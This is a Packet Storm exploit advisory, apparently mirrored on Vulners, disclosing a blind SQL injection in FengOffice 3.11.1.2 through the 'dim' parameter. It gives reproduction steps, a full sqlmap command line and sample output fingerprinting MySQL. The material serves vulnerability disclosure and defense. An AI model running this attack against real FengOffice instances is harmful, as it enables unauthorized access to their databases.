Lucene search
K

FengOffice 3.11.1.2 SQL Injection

🗓️ 10 Jun 2024 00:00:00Reported by Andrey StoykovType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 303 Views

FengOffice 3.11.1.2 SQL Injection on Ubuntu 22.0

Code
`# Exploit Title: FengOffice - Blind SQL Injection  
# Date: 06/2024  
# Exploit Author: Andrey Stoykov  
# Version: 3.11.1.2  
# Tested on: Ubuntu 22.04  
# Blog:  
https://msecureltd.blogspot.com/2024/05/friday-fun-pentest-series-6.html  
  
Steps to Reproduce:  
  
  
1. Login to application  
2. Click on "Workspaces"  
3. Copy full URL  
4. Paste the HTTP GET request into text file  
5. Set the injection point to be in the "dim" parameter value  
6. Use SQLMap to automate the process  
  
  
sqlmap -r request.txt --threads 1 --level 5 --risk 3 --dbms=mysql -p dim  
--fingerprint  
  
[...]  
[12:13:03] [INFO] confirming MySQL  
[12:13:04] [INFO] the back-end DBMS is MySQL  
[12:13:04] [INFO] actively fingerprinting MySQL  
[12:13:05] [INFO] executing MySQL comment injection fingerprint  
web application technology: Apache  
back-end DBMS: active fingerprint: MySQL >= 5.7  
comment injection fingerprint: MySQL 5.7.37  
[...]  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Jun 2024 00:00Current
7.4High risk
Vulners AI Score7.4
303